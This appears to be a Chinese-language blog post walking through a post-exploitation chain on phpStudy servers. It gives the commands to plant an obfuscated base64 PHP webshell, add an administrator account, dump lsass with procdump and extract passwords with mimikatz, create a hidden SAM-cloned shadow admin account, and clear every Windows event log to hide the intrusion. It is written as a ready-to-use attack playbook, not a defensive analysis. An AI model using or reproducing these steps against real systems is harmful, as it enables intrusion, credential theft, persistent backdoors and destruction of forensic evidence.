0%

phpstudy利用链

正文

后门就不说了,看http://www.sherlocklee.top/2019/09/26/phpstudy/

Getshell

获取网站根目录

1
echo $_SERVER["DOCUMENT_ROOT"];

使用file_put_contents写马,实际情况中可能存在各种杀马的软件,所以最好使用变种马。

1
file_put_contents("C:\myphp_www\PHPTutorial\WWW\shell.php",base64_decode("PD9waHAgYXJyYXlfbWFwKCJhc3NceDY1cnQiLChhcnJheSkkX1JFUVVFU1RbJ3NoZXInXSk7Pz4K"));

返回正常则表示马上传成功,菜刀连接

深入查询

Administrator用户,开了3389,3306,445,并且对外开发

这里可以尝试window读密码神器读取Administrator密码

获取密码

先创建一个用户,并且放在Administrator同一个组下

1
2
3
net user test 123456 /add
net localgroup
net localgroup administrators test /add

成功登录,在登录时共享文件夹,好上传windows读密码神器

上传mimikatz,读取密码

先使用procdump64.exe,获取lsass.exe中本地安全和登陆策略

1
procdump64.exe -accepteula -ma lsass.exe lsass.dmp

得到lsass.dmp,使用mimikatz.exe

1
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit >>log.txt

成功登录Administrator账户

到此就差不多了,但是如果管理员换密码了,我们再创建用户上传文件读密码,这样不是很麻烦吗?

解决这个问题直接添加后门账户

添加后门隐藏账户

一下操作需要在高权限账户下才可以执行

创建“隐藏”用户

1
2
3
net user test$ test /add /y
net localgroup administrators test$ /add
net localgroup "remote desktop users" test$ /add

但是这种方法在命令行下查不出来,但是图形化下还是可以看到的

完善”影子账户”

通过更改注册表信息成就完美后门账户

输入 regedit 打开注册表编辑器,打开HKEY_LOCAL_MACHINE\SAM\SAM,因为没有权限,所以找不到后门账户,右击-》权限,赋予administrators完全控制权限

现在可以看到后门账户

将administrator(1F4) 对应目录中的F值复制到后门用户对应目录中的F值复制到后门账户中,然后把(3EE)和test$导出,然后删除后门用户

1
net user test$ /del

重新导入两个导出的注册表注册表,这样就添加了一个隐藏的用户

扫尾巴

离开时一定要把自己的登录痕迹清除干净。

win7以上有的系统存在有自带的日志清楚工具wevtutil.exe

这里不说怎么使用了,直接上payload

1
for /F "tokens=*" %a in ('wevtutil.exe el') DO wevtutil.exe cl "%a"

删除所有的日志,简单粗暴

下面的一篇文章有总结一些日志删除和绕过的方法

https://www.4hou.com/penetration/5998.html

References

https://www.k0rz3n.com/2018/06/26/windows%E6%B8%97%E9%80%8F%E4%B8%AD%E5%90%8E%E9%97%A8%E7%94%A8%E6%88%B7%E6%B7%BB%E5%8A%A0%E6%96%B9%E6%B3%95%E6%8E%A2%E7%A9%B6/